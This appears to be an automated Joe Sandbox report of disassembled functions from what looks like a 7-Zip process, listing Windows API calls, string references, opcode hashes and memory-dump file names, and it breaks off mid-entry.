Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
Instruction ID: 256287c1f830ed8c087f4466126a4c1c443d51948b6dff1bcd4b1961451f992c
Opcode Fuzzy Hash: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
Instruction Fuzzy Hash: 4C016D7736624096E710CF14C56C35E7BA0B7D5B68F144208DBA84B3D1CB7AC54ACBA4

Function 0097CB78 Relevance: 1.3, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0097CBA8

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
Instruction ID: a59773c226bca63c9454db75a5964895837b6771a1410ce487d92f8323ff57dc
Opcode Fuzzy Hash: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
Instruction Fuzzy Hash: 35F0E5A335014887CB109F79998136822A1FB48795FD4983DFF8A87602EA28CC99C724

Function 0097CB34 Relevance: 1.3, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 009789D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 009789EA

GetLastError.KERNEL32 ref: 0097CB49

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
Instruction ID: 91324d577c81ff321c97d88f865a9f3b6c0e3f742e27f08ffb15462ea924e895
Opcode Fuzzy Hash: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
Instruction Fuzzy Hash: FAD05B82750094C6DB105AFD5CD53351181B718751FD0983DFE5FD6253E51DCDC9A229

Function 00973314 Relevance: 1.3, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 00973339

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
Instruction ID: ecf2786f6575141cc64700710cdb3526201f06979bf41687c35d4e5f02d90be9
Opcode Fuzzy Hash: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
Instruction Fuzzy Hash: CFD05EA67516C886CA049F27D68161DA3219BC8FE4708D4249F480BB0ADE20C8E58740

Function 009789D8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 009789EA

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
Instruction ID: c268e5a8483c893fd6d11de00e5e67e8db94227b755457484f667ff04ec9ffb1
Opcode Fuzzy Hash: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
Instruction Fuzzy Hash: A8D0C773601D4581DB251F7ED8443352359A755B74F188310DAB54A2D0DF2589D78715

Function 0097CDF4 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0097CE0D

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
Instruction ID: b8d3bf0ee1b456760b123fdce851703d3a29e384374e5e1372b32fbd5fbf62b6
Opcode Fuzzy Hash: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
Instruction Fuzzy Hash: 75C08C8378224842CA0D222B2F8732C02060FCABD1E8CC0209E4C0BB52DE548CE28710

Non-executed Functions

Function 0097F1B4 Relevance: 79.1, APIs: 39, Strings: 6, Instructions: 318COMMON

Download Yara Rule

APIs

Part of subcall function 00973314: memmove.MSVCRT ref: 00973339

free.MSVCRT ref: 0097F201
free.MSVCRT ref: 0097F23D

Strings

Incorrect Map command, xrefs: 0097F206, 0097F242
Can not open mapping, xrefs: 0097F33E
Unsupported Map data size, xrefs: 0097F665
MapViewOfFile error, xrefs: 0097F3C9
Unsupported Map data, xrefs: 0097F464
Map data error, xrefs: 0097F58D

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID: Can not open mapping$Incorrect Map command$Map data error$MapViewOfFile error$Unsupported Map data$Unsupported Map data size
API String ID: 1534225298-798110030
Opcode ID: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
Instruction ID: 7ba088c8a1e8463af4955a74b7c2f6c53690a4ae43f46029e2b35b8885327f20
Opcode Fuzzy Hash: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
Instruction Fuzzy Hash: 75C15F73229A40C6DA10EF15F8A076EB764F7C5BA0F949532FA8E53A29DF38C445CB40

Function 009A2578 Relevance: 45.3, APIs: 36, Instructions: 335COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009A2578
free.MSVCRT ref: 009A257A
free.MSVCRT ref: 009A258B
free.MSVCRT ref: 009A259C
free.MSVCRT ref: 009A25AD
free.MSVCRT ref: 009A25BA
free.MSVCRT ref: 009A279A
free.MSVCRT ref: 009A27A7
free.MSVCRT ref: 009A27B4
free.MSVCRT ref: 009A27C1

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
Instruction ID: 27d3d69ed6004cd469b5799e88333b7ad594b2fef20a6915b3e0f087f4cb1a9d
Opcode Fuzzy Hash: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
Instruction Fuzzy Hash: F3D15B37219AC481CA34DF26E464AAE7764F7CAB84F419052DF9E53B25CF38C845CB94

Function 009B66A8 Relevance: 43.9, APIs: 12, Strings: 13, Instructions: 131libraryloadertimeCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 009B66B6
GetProcessTimes.KERNEL32 ref: 009B66E1
memset.MSVCRT ref: 009B670C
GetModuleHandleW.KERNEL32 ref: 009B6721
GetProcAddress.KERNEL32 ref: 009B6734
LoadLibraryW.KERNEL32 ref: 009B6749
GetProcAddress.KERNEL32 ref: 009B675E
GetCurrentProcess.KERNEL32 ref: 009B676C
GetProcAddress.KERNEL32 ref: 009B678B
GetCurrentProcess.KERNEL32 ref: 009B6799
fputs.MSVCRT ref: 009B682A
fputs.MSVCRT ref: 009B6864

Strings

Virtual , xrefs: 009B689B
Psapi.dll, xrefs: 009B6742
Kernel , xrefs: 009B6806
H, xrefs: 009B66FC
Process, xrefs: 009B6880
K32GetProcessMemoryInfo, xrefs: 009B6727
MCycles, xrefs: 009B685A
kernel32.dll, xrefs: 009B6711
Physical, xrefs: 009B68C2
GetProcessMemoryInfo, xrefs: 009B6754
Global , xrefs: 009B68A7
QueryProcessCycleTime, xrefs: 009B6781
User , xrefs: 009B686A

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: Process$AddressCurrentProc$fputs$HandleLibraryLoadModuleTimesmemset
String ID: MCycles$GetProcessMemoryInfo$Global $H$K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
API String ID: 600854398-319139910
Opcode ID: 4de089bbcb59170ecffb44d8e6b4bb1020c1b67aaf46552131cc09be39bde8ef
Instruction ID: f6ffc0eb1f68d20661d769d7647dc03a9a168365ea92b2cb5976f60ec35a28d1
Opcode Fuzzy Hash: 4de089bbcb59170ecffb44d8e6b4bb1020c1b67aaf46552131cc09be39bde8ef
Instruction Fuzzy Hash: 29518E66305A8582EF20DB69FD90BE97361F788B90F444026DE8E4376AEF3CD549C700

Function 009B3528 Relevance: 35.5, APIs: 19, Strings: 1, Instructions: 472stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 009B35A7

Part of subcall function 00972320: free.MSVCRT ref: 0097237E
Part of subcall function 00972320: fputs.MSVCRT ref: 009723B8
Part of subcall function 00972320: free.MSVCRT ref: 009723C4

fputs.MSVCRT ref: 009B35D8
fputs.MSVCRT ref: 009B3609
fputs.MSVCRT ref: 009B36BF
fputs.MSVCRT ref: 009B373F

Part of subcall function 009A5680: free.MSVCRT ref: 009A5737
Part of subcall function 009A5680: free.MSVCRT ref: 009A5907
Part of subcall function 009A5680: free.MSVCRT ref: 009A5911

free.MSVCRT ref: 009B370F
fputs.MSVCRT ref: 009B37CB
fputs.MSVCRT ref: 009B391B
strlen.MSVCRT ref: 009B3929
memset.MSVCRT ref: 009B395E
fputs.MSVCRT ref: 009B39B1
strlen.MSVCRT ref: 009B39BF
memset.MSVCRT ref: 009B39EE
fputs.MSVCRT ref: 009B3AC1
strlen.MSVCRT ref: 009B3AE4
memset.MSVCRT ref: 009B3B1C
memmove.MSVCRT ref: 009B3B3E
memset.MSVCRT ref: 009B3B56
strlen.MSVCRT ref: 009B3B62

Strings

data:, xrefs: 009B3738

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$free$memset$strlen$memmove
String ID: data:
API String ID: 527563900-3222861102
Opcode ID: 4b6c5f9cdd3633745e31563a8c4377074848a1f4c9f847770a3d002162f2b606
Instruction ID: 0e40c26b01fecd36d229e899b5341491914f9ba3914210b1812c7ecb180b4a0b
Opcode Fuzzy Hash: 4b6c5f9cdd3633745e31563a8c4377074848a1f4c9f847770a3d002162f2b606
Instruction Fuzzy Hash: B0023573208682D7DB20DF35EA903EE7760F3D47A8F849112EA4A47669DF78CA49C740

Function 009AFA0C Relevance: 26.7, APIs: 12, Strings: 3, Instructions: 489COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 009AFAAC
free.MSVCRT ref: 009AFAC0
free.MSVCRT ref: 009AFC43

Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F

Part of subcall function 009AF820: _CxxThrowException.MSVCRT ref: 009AF88D

free.MSVCRT ref: 009B0031

Part of subcall function 009AF8B8: memmove.MSVCRT ref: 009AF91E
Part of subcall function 009AF8B8: free.MSVCRT ref: 009AF926

Part of subcall function 009AF93C: memmove.MSVCRT ref: 009AF992
Part of subcall function 009AF93C: free.MSVCRT ref: 009AF99A

free.MSVCRT ref: 009B00EA
free.MSVCRT ref: 009B00F2
free.MSVCRT ref: 009B0101
free.MSVCRT ref: 009B010A
free.MSVCRT ref: 009B0113
free.MSVCRT ref: 009B0121
_CxxThrowException.MSVCRT ref: 009B0184

Strings

Internal file name collision (file on disk, file in archive):, xrefs: 009B015D
Duplicate filename in archive:, xrefs: 009B0149
Duplicate filename on disk:, xrefs: 009AFCB4

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ExceptionThrow$memmove$mallocmemset
String ID: Duplicate filename in archive:$Duplicate filename on disk:$Internal file name collision (file on disk, file in archive):
API String ID: 3338823681-819937569
Opcode ID: 17f6f14bac71751efe80d9b04e97d87e47ae6380bf435bb0da8020714141aded
Instruction ID: 5554e941f19cf0f6523b19bbe3a1559022f78d8f70a3ede078782ee841bfdf92
Opcode Fuzzy Hash: 17f6f14bac71751efe80d9b04e97d87e47ae6380bf435bb0da8020714141aded
Instruction Fuzzy Hash: 881291732186848AC720DF6AE55075EB7A5F3CAB90F504625EF9E47B59CB38C891CF40

Function 0098AF58 Relevance: 11.7, APIs: 9, Instructions: 447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1de10b3c9db1c438cb2868e4062a9709d6c79681b265985f1a4863e49c1adaa6
Instruction ID: 34837cd0fd2bbc1038085bc21b0b5d55ae558db111a5a1fe847adba2e37f4e92
Opcode Fuzzy Hash: 1de10b3c9db1c438cb2868e4062a9709d6c79681b265985f1a4863e49c1adaa6
Instruction Fuzzy Hash: CA023C32209B8186DB24EF65E4903AEB365FBC5B84F584526DB8E57B69DF7CC844CB00

Function 00978F18 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 142COMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32 ref: 00978F7A
DeviceIoControl.KERNEL32 ref: 0097905E
DeviceIoControl.KERNEL32 ref: 009790B5
DeviceIoControl.KERNEL32 ref: 009790F6

Part of subcall function 0097ABB0: GetModuleHandleW.KERNEL32 ref: 0097ABD1
Part of subcall function 0097ABB0: GetProcAddress.KERNEL32 ref: 0097ABE1
Part of subcall function 0097ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 0097AC32

Strings

(, xrefs: 00979051
:, xrefs: 00978FF2

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ControlDevice$AddressDiskFreeHandleModuleProcSpace
String ID: ($:
API String ID: 4250411929-4277925470
Opcode ID: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
Instruction ID: 69c720ee0dc3248dc19882b55bf867ee482154dc86bbc82ce0fa3f6d0fb3a94a
Opcode Fuzzy Hash: 5b9f9703c519a548ceef949604e44196ebe8030fab0dc2f4f3b95e46287e534a
Instruction Fuzzy Hash: C251AC23618BC19ACB20DF24F05179EB769F385758F94C526DB8E47B58EB38C4A8CB40

Function 0097881C Relevance: 10.6, APIs: 7, Instructions: 102COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0097885B
free.MSVCRT ref: 00978863
GetLogicalDriveStringsW.KERNEL32 ref: 00978879
GetLogicalDriveStringsW.KERNEL32 ref: 009788B2
free.MSVCRT ref: 00978943
free.MSVCRT ref: 0097894C
free.MSVCRT ref: 00978959

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$DriveLogicalStrings
String ID:
API String ID: 837055893-0
Opcode ID: 106ba36bd963fc83ddaed19d6b0af85a96b103604d59597e7e5fa49efd96df8e
Instruction ID: 9c44a49b3ae4efc07b8b8ea2dfe62738a3b0c25b7c4f6ce3cfa1d34c341b2017
Opcode Fuzzy Hash: 106ba36bd963fc83ddaed19d6b0af85a96b103604d59597e7e5fa49efd96df8e
Instruction Fuzzy Hash: 5431D363345A4185DA30EB26AC5936B6355BB85BE8F88C2309F6E47385DF38C846C311

Function 009796AC Relevance: 10.6, APIs: 7, Instructions: 88COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009796D1
GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 00979723
DeviceIoControl.KERNEL32 ref: 0097976C
free.MSVCRT ref: 00979779
free.MSVCRT ref: 00979796
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF,00000001,00000000), ref: 009797C4
free.MSVCRT ref: 009797CD

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ControlDeviceFileHandleInformationmemmove
String ID:
API String ID: 2572579059-0
Opcode ID: 66249682d96c9e811446979bc573c52628216d425e2c3449b3ad2fbb2eaf9277
Instruction ID: b5d3ff030fab6a01f0a2f5661b955f0a7445137ff365da214107c2786e2acb5c
Opcode Fuzzy Hash: 66249682d96c9e811446979bc573c52628216d425e2c3449b3ad2fbb2eaf9277
Instruction Fuzzy Hash: E6314F33259A408AC6349F16F95076AB768F7C6BE0F58C221EBED47B95DE39C491C700

Function 009BDBA0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 009BDBB4
GetVersionExW.KERNEL32 ref: 009BDBBF
GetModuleHandleW.KERNEL32 ref: 009BDBDE
GetProcAddress.KERNEL32 ref: 009BDBEE

Strings

SetDefaultDllDirectories, xrefs: 009BDBE4
kernel32.dll, xrefs: 009BDBD7

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: Version$AddressHandleModuleProc
String ID: SetDefaultDllDirectories$kernel32.dll
API String ID: 2268189529-2102062458
Opcode ID: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
Instruction ID: 8789200b6c1a17d0f8d61e88b0b20cc3f080cf1a949703ab96551b67219ada40
Opcode Fuzzy Hash: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
Instruction Fuzzy Hash: 81F0D43560AA0292FF349B50FA643A973A4FB88B29F450235C29E412B5EF3CC649CB50

Function 0097ABB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0097ABD1
GetProcAddress.KERNEL32 ref: 0097ABE1
GetDiskFreeSpaceW.KERNEL32 ref: 0097AC32

Strings

GetDiskFreeSpaceExW, xrefs: 0097ABD7
kernel32.dll, xrefs: 0097ABBE

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: AddressDiskFreeHandleModuleProcSpace
String ID: GetDiskFreeSpaceExW$kernel32.dll
API String ID: 1197914913-1127948838
Opcode ID: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
Instruction ID: 3cefe2194666a8164c8c2ad9647f3b418553d11f8a103151e85aacd93a92e067
Opcode Fuzzy Hash: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
Instruction Fuzzy Hash: DB118C73216F4696DB11CF59F990B9AB364F7A4B90F449022EB8D03724EF38C559C700

Function 0097B114 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188timeCOMMON

Download Yara Rule

APIs

FileTimeToLocalFileTime.KERNEL32 ref: 0097B12A
FileTimeToSystemTime.KERNEL32 ref: 0097B13E

Strings

gfff, xrefs: 0097B1D7

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: Time$File$LocalSystem
String ID: gfff
API String ID: 1748579591-1553575800
Opcode ID: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
Instruction ID: 7b5e229f26735b3468fed1a65e9c92bc8aacd3dcd8f74f39622dd06e3c8c59c8
Opcode Fuzzy Hash: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
Instruction Fuzzy Hash: 10518A93B042C04BD7198B3DD846BCDBFC1E3A5758F48C22ADB5587785E26DC50AC721

Function 0097B5E0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

Part of subcall function 0097B5B8: GetCurrentProcess.KERNEL32 ref: 0097B5C2

GetSystemInfo.KERNEL32 ref: 0097B624

Memory Dump Source

